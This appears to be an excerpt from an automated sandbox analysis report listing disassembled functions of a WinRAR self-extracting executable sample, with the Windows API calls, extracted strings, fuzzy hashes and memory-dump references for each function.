                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextWindow
                                                                    • String ID: LICENSEDLG
                                                                    • API String ID: 2478532303-2177901306
                                                                    • Opcode ID: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                                                    • Instruction ID: 6bc5834664155ed6929c5f24cf15c4a238561fe36a4f0d5bff2622798353ccfe
                                                                    • Opcode Fuzzy Hash: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                                                    • Instruction Fuzzy Hash: 3D41C332F0C652A2FB54BB55A804379A391AF84F80FE41035D90E03B95DFBCE956E321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                    • API String ID: 2915667086-2207617598
                                                                    • Opcode ID: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                                                    • Instruction ID: 27f9f53707db79ef8089a6005d085bc14a15e9b2dc992f2e5dd66519cd1706c4
                                                                    • Opcode Fuzzy Hash: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                                                    • Instruction Fuzzy Hash: 4D315C61E09B53B1FB14FB16A8912B5E3A0BF49B94FE44135C95D43BA0DEBCE441B320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: $
                                                                    • API String ID: 3668304517-227171996
                                                                    • Opcode ID: 4595b3364d3afe6788a6be0f0336865034914281edadcaa22e865f46ac2c6e14
                                                                    • Instruction ID: ef7d3a3ad8529c4dd6aa3c4e9e43649c3d33ee60066b035da25b6817058e0299
                                                                    • Opcode Fuzzy Hash: 4595b3364d3afe6788a6be0f0336865034914281edadcaa22e865f46ac2c6e14
                                                                    • Instruction Fuzzy Hash: 1FF1E563F1474AA0EF04AB64D4481BCA361BB45BA8FA05631CB5D17BD5EFBCE190E360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2940173790-393685449
                                                                    • Opcode ID: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                                                    • Instruction ID: 86cde26dcb18e6d0ca6596838d37d55fe75d7b36b73aeb7e3df24942af8f890d
                                                                    • Opcode Fuzzy Hash: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                                                    • Instruction Fuzzy Hash: DAE1D172D087829AE712AF74D4803BDB7B0FB44758FA48935DA8D47A96CF78E481D710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AllocClearStringVariant
                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                    • API String ID: 1959693985-3505469590
                                                                    • Opcode ID: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                                                    • Instruction ID: 24cce6f186e89a1d3bc0f0f5037b338efc02208f4b29126fdaf0935b373ac755
                                                                    • Opcode Fuzzy Hash: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                                                    • Instruction Fuzzy Hash: 19714E36E14B0595EB10EF65D8805ADB7B0FB88B98BA45136EE4E43B68CFBCD144D710
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA72F1
                                                                    • GetLastError.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA72FF
                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA7329
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA736F
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA737B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                                                    • Instruction ID: 79bd4cbc5a56d61238feefdddb662ffa5d7028c61832b408863729f22c9af574
                                                                    • Opcode Fuzzy Hash: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                                                    • Instruction Fuzzy Hash: 3E31C521E1B742A1EF12FB42A801579A394FF44FA0FAA4A35DD1D47750DFBCE4409720
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15AB
                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15C8
                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                    • API String ID: 667068680-1718035505
                                                                    • Opcode ID: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                                                    • Instruction ID: aef6a6d566a872227ad77b3e5de7195acfaffc9bb84bc0db6dafe74fc8c3843d
                                                                    • Opcode Fuzzy Hash: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                                                    • Instruction Fuzzy Hash: 79110C61E0EB02B1FF52AB41A540275E395AF08794FFC9934C95E87764FEBCA444A330
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C85164: GetVersionExW.KERNEL32 ref: 00007FF731C85195
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED0C
                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED18
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED28
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED36
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED44
                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                    • String ID:
                                                                    • API String ID: 2092733347-0
                                                                    • Opcode ID: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                                                    • Instruction ID: 02774a9cb6e21941c398a3c18f68adb0beb9fe2a533dac6473ffeec70a5fe769
                                                                    • Opcode Fuzzy Hash: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                                                    • Instruction Fuzzy Hash: A2518CB2F106519BEB04DFA8D4401AC77B1F748B88BA0803ADE0DA7B58DF78E556C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                    • String ID:
                                                                    • API String ID: 2092733347-0
                                                                    • Opcode ID: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                                                    • Instruction ID: 4ebc6eb02df5c8897c1128e310dcca865b8c3abd46b424dd4af2c0eace3a16b3
                                                                    • Opcode Fuzzy Hash: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                                                    • Instruction Fuzzy Hash: BC315C62F10A51DEFB04DFB5D8801AC7370FB08758BA4502AEE0D93A58EF78D895C311
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: .rar$exe$rar$sfx
                                                                    • API String ID: 3668304517-630704357
                                                                    • Opcode ID: 396299a5b1ccd598accc38a78ad002547d98c5a043810e6323e0cb500f167d8a
                                                                    • Instruction ID: 281ef63508eabe689d7889fd18bf45b98624c7e791d4b0fc9e549940e0e2907d
                                                                    • Opcode Fuzzy Hash: 396299a5b1ccd598accc38a78ad002547d98c5a043810e6323e0cb500f167d8a
                                                                    • Instruction Fuzzy Hash: 2EA1E222E14B5660EB00EF65D8852BCA361FF40B98FA05235CE1D17AE9EFBCE541D360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2889003569-2084237596
                                                                    • Opcode ID: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                                                    • Instruction ID: 913b837c41555c84e9c77a510feb50b474403d72e178ae11a5450e977f1375d2
                                                                    • Opcode Fuzzy Hash: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                                                    • Instruction Fuzzy Hash: 3491CFB3E08B819AE711EB64E8402ADBBB0F704798F648529EF8C07B55DF78D195D700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                                                    • Instruction ID: 800c46d0bbb511636df36a0a6aba7ff9fc415f69defb9251d775c8f0b21b1785
                                                                    • Opcode Fuzzy Hash: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                                                    • Instruction Fuzzy Hash: C851F632F09202A6DB15EF11E444A69B7A5FB40B88FB0C834DE0E47749DFB9E841E760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                    • API String ID: 2102711378-639343689
                                                                    • Opcode ID: 2422b4c07861c816dcb6e088245771ec7e30f8252f36e9de8bdb4ac705605003
                                                                    • Instruction ID: a982986e195720ef1ee85d91628eec06dd2136940f895c2a10e77eb9e2a5fa97
                                                                    • Opcode Fuzzy Hash: 2422b4c07861c816dcb6e088245771ec7e30f8252f36e9de8bdb4ac705605003
                                                                    • Instruction Fuzzy Hash: 6C51BF22F08742A9FB01FB65D8952BDA360AF847E4FA01134DE4D13696DEFCE485E320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Rect
                                                                    • String ID: RarHtmlClassName
                                                                    • API String ID: 2396740005-1658105358
                                                                    • Opcode ID: 2c88818459fa249436b09cd9d1218aa4cb25f816733d15aa3761c506717048c9
                                                                    • Instruction ID: d356174b5d36777c695efd7fcc7c038528226f8ee46d5ba16261f1535b19a485
                                                                    • Opcode Fuzzy Hash: 2c88818459fa249436b09cd9d1218aa4cb25f816733d15aa3761c506717048c9
                                                                    • Instruction Fuzzy Hash: A5519632E09B819AEB24AF25E44437AE7A0FF85B80FA44535DE4E43B55DFBCE0459B10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                    • String ID: sfxcmd$sfxpar
                                                                    • API String ID: 3540648995-3493335439
                                                                    • Opcode ID: de9741161c31a08bbe9fff160a80b1df0e4e4f2ed9c3bb4d40033563ae2b19ea
                                                                    • Instruction ID: 79dcffe23722b9ae40cd484004085d6d46455fb609d0ee4597c87393aa677953
                                                                    • Opcode Fuzzy Hash: de9741161c31a08bbe9fff160a80b1df0e4e4f2ed9c3bb4d40033563ae2b19ea
                                                                    • Instruction Fuzzy Hash: FF31D032F14A06A4FB04EF69E8841ACB371FB48B98FA01131DE5D17BA8DEB8D041D360
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                    • API String ID: 0-56093855
                                                                    • Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                                    • Instruction ID: fca642b95eb0e8867bd0053d135e591c69716fba8a5ff463ff6fcd5b0f7a44e2
                                                                    • Opcode Fuzzy Hash: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                                    • Instruction Fuzzy Hash: 30211B62D0DB87A1FB10AB15E844178B7A0EB45B88FF44436D98D43360EEFCE595E360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
